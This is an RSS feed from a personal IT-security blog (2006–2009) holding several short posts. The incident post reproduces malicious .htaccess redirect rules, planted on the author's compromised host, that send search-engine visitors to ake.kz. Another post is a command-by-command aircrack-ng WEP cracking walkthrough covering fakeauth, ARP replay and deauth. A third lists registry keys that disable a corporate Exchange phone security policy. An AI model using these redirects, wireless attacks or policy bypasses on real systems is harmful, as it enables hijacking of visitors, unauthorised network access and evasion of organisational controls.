<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>the new cube 2.0 &#187; Security</title>
	<atom:link href="http://jiehong.org/blog/category/technical/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://jiehong.org/blog</link>
	<description>the new cube 2.0</description>
	<lastBuildDate>Sat, 21 Jan 2012 17:43:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Latest activity</title>
		<link>http://jiehong.org/blog/2009/07/26/latest-activity/</link>
		<comments>http://jiehong.org/blog/2009/07/26/latest-activity/#comments</comments>
		<pubDate>Sun, 26 Jul 2009 02:43:50 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[incident]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=273</guid>
		<description><![CDATA[It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. I saw a significant drop search engine directed traffic. Recently I discovered some malicious activity on my other web host. I was going through my gallery, [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' />  I saw a significant drop search engine directed traffic.</p>
<p>Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven&#8217;t renew my subscription or my domain hosting. </p>
<p>After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.</p>
<p>Sample:</p>
<blockquote><p>
ErrorDocument 400 http://ake.kz/in.cgi?8<br />
ErrorDocument 401 http://ake.kz/in.cgi?8<br />
ErrorDocument 403 http://ake.kz/in.cgi?8<br />
ErrorDocument 404 http://ake.kz/in.cgi?8<br />
ErrorDocument 500 http://ake.kz/in.cgi?8</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*search.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*<br />
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]
</p></blockquote>
<p>I discovered a folder was created in my public_html, &#8220;coming10/almost&#8221;. What&#8217;s almost, the hacking is almost done ?<br />
I found the following files inside<br />
 &#8211; .htaccess<br />
 &#8211; doing83.html<br />
 &#8211; er404.php<br />
 &#8211; everyting40php<br />
 &#8211; thanks28.html</p>
<p>They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well&#8230; I&#8217;m expecting somebody eye-balling the logs to determine the source of entry.</p>
<p>Now I still do not know how they got in, so I need to monitor my site very closely.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2009/07/26/latest-activity/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Cold Boot Attacks on Encryption Keys</title>
		<link>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/</link>
		<comments>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 17:47:17 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Systems]]></category>
		<category><![CDATA[encryption]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=238</guid>
		<description><![CDATA[I just read this article on using compressed air to cool a memory chip so it will retain data even power is been cut off. A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the [...]]]></description>
			<content:encoded><![CDATA[<p>I just read this <a href="http://hacknmod.com/hack/hack-encryption-keys-using-compressed-air/" target="_blank">article</a> on using compressed air to cool a memory chip so it will retain data even power is been cut off.</p>
<p>A video can be found <a href="http://citp.princeton.edu/memory/" target="_blank">here</a> on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.</p>
<p>The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory.  Encrypting the key in memory don&#8217;t really help, you still need to store that key that encrypts somewhere !</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/10/19/cold-boot-attacks-on-encryption-keys/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Modifying Microsoft Exchange Security Policy on Windows Mobile</title>
		<link>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/</link>
		<comments>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/#comments</comments>
		<pubDate>Sat, 04 Oct 2008 18:50:08 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[HTC]]></category>
		<category><![CDATA[Microsoft Exchange]]></category>
		<category><![CDATA[registry]]></category>
		<category><![CDATA[Touch Pro]]></category>
		<category><![CDATA[tweak]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=190</guid>
		<description><![CDATA[My story on why I decided to change the phone lock timeout. When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it [...]]]></description>
			<content:encoded><![CDATA[<p>My story on why I decided to change the phone lock timeout.</p>
<p>When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.</p>
<p>I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.</p>
<p><span id="more-190"></span></p>
<p>After the first day, I got pretty pissed off by the 15mins timeout. I tried changing it but it didn&#8217;t allow me to do that. I checked around and realise it&#8217;s actually a security policy which is pushed down by my corporate Exchange Server.</p>
<p>Firstly the 15mins timeout is too short, you don&#8217;t look at your phone every 10mins to see if you have any new SMS, missed calls or emails. So everytime when I wanted to make a call, reply a SMS, I have to enter my pin to unlock it.</p>
<p>Yes, I believe we should have security controls in place, it&#8217;s always a balance of Security and Usability. I am a working in the IT Security line <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  , but it&#8217;s too frustrating.</p>
<p>I searched around and I found this workaround. I very surprised the hack published in a <a href="http://blogs.microsoft.co.il/blogs/tamir/archive/2007/12/28/how-to-disable-exchange-security-policy-for-windows-mobile-devices.aspx" target="_blank">Microsoft blog</a> ! Here&#8217;s the screen shot of the utility and you can download it <a href="http://http://blogs.microsoft.co.il/files/folders/tamir/entry46249.aspx" target="_blank">here</a>.</p>
<p><a href="http://blogs.microsoft.co.il/files/folders/tamir/entry46249.aspx"><img class="alignleft" title="Screenshot" src="http://blogs.microsoft.co.il/blogs/tamir/WindowsLiveWriter/HowtodisableExchangeSecurityPolicyforWin_1018F/image_53399df3-8816-48e3-a45b-4f19ce5afe63.png" alt="" width="170" height="209" /></a></p>
<p>Finally, I didn&#8217;t disable the phone lock feature, I left it enabled as I did in all my previous phones. I just change the timeout to a more reasonable duration.</p>
<p>As you can see, you can disable the phone lock or modify the timeout duration. It actually modifies the value of several registry keys.</p>
<ul>
<li>Enable/Disable the Exchange security policy &#8211; HKLM\Security\Policies\00001023: 0 = Enabled; 1 = Disabled</li>
<li>Inactivity time
<ul>
<li>HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyType: 0 = No inactivity time; 1 = Activity time enable</li>
<li>HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyValue: number of minutes before timeout</li>
</ul>
</li>
</ul>
<p>Remember, the security policy is there for a reason. You won&#8217;t want your phone to be picked up by somebody with malicous intent.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/10/05/modifying-microsoft-exchange-security-policy-on-windows-mobile/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Check Point VPN-1 Support for iPhone</title>
		<link>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/</link>
		<comments>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/#comments</comments>
		<pubDate>Tue, 30 Sep 2008 04:58:33 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Mobiles]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[Check Point]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[ipsec]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/?p=186</guid>
		<description><![CDATA[Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone. Link]]></description>
			<content:encoded><![CDATA[<p>Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone.</p>
<p><a href="http://www.checkpoint.com/press/2008/iphone060208.html" target="_blank">Link</a></p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/09/30/check-point-vpn-1-support-for-iphone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Quick way to upgrade aircrack-ng in BackTrack</title>
		<link>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/</link>
		<comments>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/#comments</comments>
		<pubDate>Wed, 02 Jan 2008 17:12:16 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[aircrack]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/</guid>
		<description><![CDATA[If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here&#8217;s the commands to do so. Download the source here. tar -zxvf aircrack-ng-0.9.1.tar.gz cd aircrack-ng-0.9.1 make make -B install make install will throw out some errors, so just do it with a &#8220;-B&#8221; -B, &#8211;always-make Unconditionally make [...]]]></description>
			<content:encoded><![CDATA[<p>If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here&#8217;s the commands to do so.</p>
<p><span id="more-86"></span><br />
Download the source <a href="http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz" target="_blank">here</a>.</p>
<p>tar -zxvf aircrack-ng-0.9.1.tar.gz<br />
cd aircrack-ng-0.9.1<br />
make<br />
make -B install</p>
<p>make install will throw out some errors, so just do it with a &#8220;-B&#8221;</p>
<p>-B, &#8211;always-make            Unconditionally make all targets.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2008/01/03/a-very-quick-way-to-upgrade-aircrack-ng-in-back-track-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yet another aircrack-ng guide</title>
		<link>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</link>
		<comments>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/#comments</comments>
		<pubDate>Thu, 27 Dec 2007 18:25:01 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[linksys]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wusb54gc]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/</guid>
		<description><![CDATA[I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with Aircrack-ng. So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers. The following commands is to get your WUSB54GC dongle into the monitor/injection mode. &#8220;ifconfig rausb0 up&#8221; &#8220;iwconfig rausb0 mode monitor channel 1 [...]]]></description>
			<content:encoded><![CDATA[<p>I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with <a title="Aircrack-ng" href="http://www.aircrack-ng.org/" target="_blank">Aircrack-ng</a>.</p>
<p>So let&#8217;s get started then..Back Track 2 loaded with the rt73 drivers.</p>
<p>The following commands is to get your WUSB54GC dongle into the monitor/injection mode.</p>
<p>&#8220;ifconfig rausb0 up&#8221;</p>
<p>&#8220;iwconfig rausb0 mode monitor channel 1 rate 1M&#8221;</p>
<p>&#8220;iwpriv rausb0 forceprism 1&#8243;</p>
<p>&#8220;iwpriv rausb0 rfmontx 1&#8243;</p>
<p><span id="more-84"></span></p>
<p>I have yet to find out what those iwpriv does other than turning on some private IO controls within the card or drivers.</p>
<p>To verify that your card is ready for injecting, execute &#8220;aireplay-ng &#8211;test rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Trying broadcast probe requests&#8230;<br />
Injection is working!<br />
Found 15 APs</p>
<p>Now we are ready, open the first console and execute the following command</p>
<p>&#8220;airodump-ng &#8211;ivs -w capture &#8211;encrypt wep -a rausb0&#8243;</p>
<p>and it  will return with a list of APs by BSSID, PWR, CH, ESSID and other interesting fields and data dumped to a capture-0x.ivs</p>
<p>Once you have determine your target, you may want to re-run airodump and filter by the BSSID or leave the command running to collect the IVs.</p>
<p>Next, we will execute a series of commands in different consoles together.</p>
<p>The fakeauth attack &#8220;aireplay-ng &#8211;fakeauth 10 -e MySSID -a 00:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Waiting for beacon frame (BSSID: 00:XX:XX:XX:XX:XX)<br />
Sending Authentication Request<br />
Authentication successful<br />
Sending Association Request<br />
Association successful <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>The ARP replay attack &#8220;aireplay-ng &#8211;arpreplay -e &lt;ESSID&gt; -b &lt;BSSID&gt; -h 00:11:22:33:44:55 rausb0&#8243;</p>
<p>You should see the following:</p>
<p>Saving ARP requests in replay_arp-xxxxx.cap<br />
You should also start airodump-ng to capture replies.<br />
Read 53965 packets (got 31064 ARP requests), sent 48076 packets&#8230;(319 pps)</p>
<p>Here&#8217;s the part where I don&#8217;t get it.</p>
<p>Sometimes you have to run a deauth attack to get some ARP packets coming, sometimes I don&#8217;t need to.</p>
<p>aireplay-ng &#8211;deauth 10 -e MySSID -a &lt;00:XX:XX:XX:XX:XX&gt; -h 00:11:22:33:44:55 rausb0</p>
<p>Finally after collecting about 100k for 64bit WEP till 500k for 128bit WEP of IV packets, you may execute &#8220;aircrack-ng -b 00:XX:XX:XX:XX:XX capture-0x.ivs&#8221;</p>
<p>You should see the following:</p>
<p>[00:00:00] Tested 1 keys (got 208713 IVs)</p>
<p>KB    depth   byte(vote)<br />
0    0/  1   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>0    0/  2   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>.</p>
<p>.</p>
<p>0    0/  5   XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX) XX(  XX)</p>
<p>KEY FOUND! [ XX:XX:XX:XX:XX ]<br />
Decrypted correctly: 100%</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2007/12/28/yet-another-aircrack-ng-guide/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>U3 storage drives rocks</title>
		<link>http://jiehong.org/blog/2006/12/09/u3-storage-drives-rocks/</link>
		<comments>http://jiehong.org/blog/2006/12/09/u3-storage-drives-rocks/#comments</comments>
		<pubDate>Fri, 08 Dec 2006 21:26:55 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Systems]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2006/12/09/u3-storage-drives-rocks/</guid>
		<description><![CDATA[I got my Sandisk 2GB U3 drive at Sitex 2006 @ SGD71. This is a real threat of U3 drives, check the hacks available here: http://www.hak5.org/wiki/USB_Hacksaw Forbes reported, A recent news of data related to U.S underground nuclear weapon tests been leaked from Los Alamo Labs. The threat of USB and other removable media is [...]]]></description>
			<content:encoded><![CDATA[<p>I got my Sandisk 2GB U3 drive at Sitex 2006 @ SGD71. This is a real threat of U3 drives, check the hacks available here: <a target="_blank" href="http://www.hak5.org/wiki/USB_Hacksaw">http://www.hak5.org/wiki/USB_Hacksaw</a></p>
<p><a target="_blank" href="http://www.forbes.com/technology/ebusiness/feeds/ap/2006/11/28/ap3211166.html">Forbes</a> reported, A recent news of data related to U.S underground nuclear weapon tests been leaked from Los Alamo Labs.</p>
<p>The threat of USB and other removable media is real and enterprises should be looking into solutions to protect those endpoints</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2006/12/09/u3-storage-drives-rocks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>USB Hacks with the latest U3 smart drives</title>
		<link>http://jiehong.org/blog/2006/10/18/usb-hacks-with-the-latest-u3-smart-drives/</link>
		<comments>http://jiehong.org/blog/2006/10/18/usb-hacks-with-the-latest-u3-smart-drives/#comments</comments>
		<pubDate>Wed, 18 Oct 2006 15:38:06 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2006/10/18/usb-hacks-with-the-latest-u3-smart-drives/</guid>
		<description><![CDATA[Wow I need to get a U3 Thumbdrive ! A thumbdrive with 2 partition, 1 which emulate a CD/DVDrom device when plugged into your workstation. Quoted from Wikipedia, &#8220;USB flash drives adhering to the U3 specification are termed &#8220;U3 smart drives&#8221; by U3.com. &#8220;U3 smart drives&#8221; differ from traditional USB flash drives because they come [...]]]></description>
			<content:encoded><![CDATA[<p>Wow I need to get a U3 Thumbdrive !</p>
<p>A thumbdrive with 2 partition, 1 which emulate a CD/DVDrom device when plugged into your workstation.</p>
<p>Quoted from <a target="_blank" href="http://en.wikipedia.org/wiki/U3">Wikipedia</a>, &#8220;USB flash drives adhering to the U3 specification are termed &#8220;U3 smart drives&#8221; by U3.com. &#8220;U3 smart drives&#8221; differ from traditional USB flash drives because they come preinstalled with the U3 Launchpad, which emulates the Windows OS start menu, and controls program installation.&#8221;</p>
<p>Autorun ? Payload ? Malware ? endless ways to go right through your cleverly laid perimeter security.</p>
<p><a target="_blank" href="http://www.hak5.org/wiki/USB_Hacksaw">http://www.hak5.org/wiki/USB_Hacksaw</a> USB shall be seen as EVIL !</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2006/10/18/usb-hacks-with-the-latest-u3-smart-drives/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Secure your passwords, files, drives.</title>
		<link>http://jiehong.org/blog/2006/05/12/secure-your-passwords-files-drives/</link>
		<comments>http://jiehong.org/blog/2006/05/12/secure-your-passwords-files-drives/#comments</comments>
		<pubDate>Fri, 12 May 2006 06:33:16 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Technical]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2006/05/12/secure-your-passwords-files-drives/</guid>
		<description><![CDATA[I have a problem which most of us are facing. How many usernames and passwords are you keeping track of ? Or even the email address that you used to create that account with ? Admit it, most of us have more than 1 email address. So how do you keep track of them ? [...]]]></description>
			<content:encoded><![CDATA[<p>I have a problem which most of us are facing.</p>
<p>How many usernames and passwords are you keeping track of ? Or even the email address that you used to create that account with ? Admit it, most of us have more than 1 email address. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
So how do you keep track of them ? Save into a spreadsheet ? Are they secured ? Most spreadsheets built-in protection are not good enough.</p>
<p><span id="more-27"></span></p>
<p>Introducing <a target="_blank" href="http://keepass.sourceforge.net/">KeePass</a> (Windows), <a target="_blank" href="http://keepass.berlios.de/en/">KeePassX</a> (Linux), <a target="_blank" href="http://passwordsafe.sourceforge.net/">PasswordSafe</a> (Windows) and <a target="_blank" href="http://www.semanticgap.com/myps/">MyPasswordSafe</a> (Linux).</p>
<p>They all have the same purpose, keeping your usernames and password under a master password. KeePass database is encrypted with AES, Twofish and your master password hashed with SHA256. My/PasswordSafe didn&#8217;t provided detailed enough information regarding security except they use Blowfish for the database encryption.</p>
<p>Now how about securing personal files and those password databases ? Try <a target="_blank" href="http://www.truecrypt.org/">TrueCrypt</a>. This is available for both Linux(CLI) and Windows.</p>
<p>TrueCrypt will create a file eg, 1024MB in your filesystem. You can mount it as a drive in Windows or a folder in Linux. Any files written into it is protected with encryption algorithms of your own choice.</p>
<p>Well, to conclude, &#8220;A chain is only as strong as the weakest link&#8221;.</p>
<p>Having a strong encryption protection won&#8217;t help unless you use a complex passphrase containing alpha-numerics and symbols, ensure that the length is at least 20 characters. <img src='http://jiehong.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>You can generate a strong passphrase at <a target="_blank" href="https://www.grc.com/passwords">GRC</a>.</p>
<p>Now, don&#8217;t you go writing it down on a Post-It note and pasting it on your monitor.</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2006/05/12/secure-your-passwords-files-drives/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ISMS, ISO17799, BS7799</title>
		<link>http://jiehong.org/blog/2006/04/24/isms-iso17799-bs7799/</link>
		<comments>http://jiehong.org/blog/2006/04/24/isms-iso17799-bs7799/#comments</comments>
		<pubDate>Mon, 24 Apr 2006 14:52:55 +0000</pubDate>
		<dc:creator>jiehong</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://jiehong.org/blog/2006/04/24/isms-iso17799-bs7799/</guid>
		<description><![CDATA[Will companies use a system like ISMS to ensure that they are meeting with ISO17799, BS7799 compliance for Information Security ? ISMS in short, Information Security Management System ISMS, detailed documentation on controls, threats, vulnerabilities. Any book to recommend or document templates samples for an inspiring Security Auditor ? :p]]></description>
			<content:encoded><![CDATA[<p>Will companies use a system like ISMS to ensure that they are meeting with ISO17799, BS7799 compliance for Information Security ?</p>
<p>ISMS in short, <a target="_blank" href="http://en.wikipedia.org/wiki/ISMS">Information Security Management System</a><br />
ISMS, detailed documentation on controls, threats, vulnerabilities.</p>
<p>Any book to recommend or document templates samples for an inspiring Security Auditor ? :p</p>
]]></content:encoded>
			<wfw:commentRss>http://jiehong.org/blog/2006/04/24/isms-iso17799-bs7799/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

